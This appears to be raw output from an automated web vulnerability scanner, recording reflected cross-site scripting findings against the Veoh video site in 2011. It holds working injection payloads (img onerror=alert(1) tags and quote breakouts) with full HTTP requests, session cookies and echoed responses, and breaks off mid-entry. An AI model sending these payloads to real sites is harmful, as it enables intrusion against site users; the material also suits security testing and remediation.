The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1 was submitted in the REST URL parameter 4. This input was echoed as fcae8"><img src=a onerror=alert(1)>26d66e628b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/celebrity_and_showbizfcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=50
Content-Length: 77572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/celebrity_and_showbizfcae8"><img src=a onerror=alert(1)>26d66e628b1/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160 was submitted in the REST URL parameter 4. This input was echoed as fb1e3<img src=a onerror=alert(1)>01b1c12b160 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/celebrity_and_showbizfb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=9
Content-Length: 77528
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_celebrity_and_showbizfb1e3<img src=a onerror=alert(1)>01b1c12b160"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e231'%3bf41ab2e3621 was submitted in the REST URL parameter 6. This input was echoed as 3e231';f41ab2e3621 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T3e231'%3bf41ab2e3621 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 99706
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1 was submitted in the REST URL parameter 4. This input was echoed as 1b1b0<img src=a onerror=alert(1)>1aed6fadab1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/educational_and_howto1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1/watch/v20767155HXCcYkcJ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:45 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 78324
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_educational_and_howto1b1b0<img src=a onerror=alert(1)>1aed6fadab1"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d was submitted in the REST URL parameter 4. This input was echoed as aa06e"><img src=a onerror=alert(1)>7b8d668185d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/educational_and_howtoaa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d/watch/v20767155HXCcYkcJ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=96 Content-Length: 78368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/educational_and_howtoaa06e"><img src=a onerror=alert(1)>7b8d668185d/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1c2d'%3b713d1af7ffd was submitted in the REST URL parameter 6. This input was echoed as b1c2d';713d1af7ffd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJb1c2d'%3b713d1af7ffd HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:55 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=80 Content-Length: 99708
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906 was submitted in the REST URL parameter 4. This input was echoed as b4e10"><img src=a onerror=alert(1)>e01df9f8906 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/entertainmentb4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906/watch/v20767324YkGXZzfQ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:35 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=75 Content-Length: 76209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/entertainmentb4e10"><img src=a onerror=alert(1)>e01df9f8906/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a was submitted in the REST URL parameter 4. This input was echoed as b3fcf<img src=a onerror=alert(1)>5a765c7587a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/entertainmentb3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a/watch/v20767324YkGXZzfQ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=100 Content-Length: 76165
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_entertainmentb3fcf<img src=a onerror=alert(1)>5a765c7587a"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48a9e'%3b18c90b1747d was submitted in the REST URL parameter 6. This input was echoed as 48a9e';18c90b1747d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ48a9e'%3b18c90b1747d HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:39:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=50 Content-Length: 95042
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac was submitted in the REST URL parameter 4. This input was echoed as b9b8b"><img src=a onerror=alert(1)>fa9b9160bac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/people_and_blogsb9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac/watch/v20767178Fn5bZQJP HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:28 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=60 Content-Length: 77558
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/people_and_blogsb9b8b"><img src=a onerror=alert(1)>fa9b9160bac/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1 was submitted in the REST URL parameter 4. This input was echoed as 36ade<img src=a onerror=alert(1)>19ea89e01e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/people_and_blogs36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1/watch/v20767178Fn5bZQJP HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 77514
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_people_and_blogs36ade<img src=a onerror=alert(1)>19ea89e01e1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 614f9'%3be5e8b5ac5dc was submitted in the REST URL parameter 6. This input was echoed as 614f9';e5e8b5ac5dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP614f9'%3be5e8b5ac5dc HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:39:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=58 Content-Length: 106431
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 was submitted in the REST URL parameter 4. This input was echoed as ba32a"><img src=a onerror=alert(1)>a3be2b20567 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/groupsba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:47:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=51
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e was submitted in the REST URL parameter 4. This input was echoed as 254d4"><img src=a onerror=alert(1)>329c969f72e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
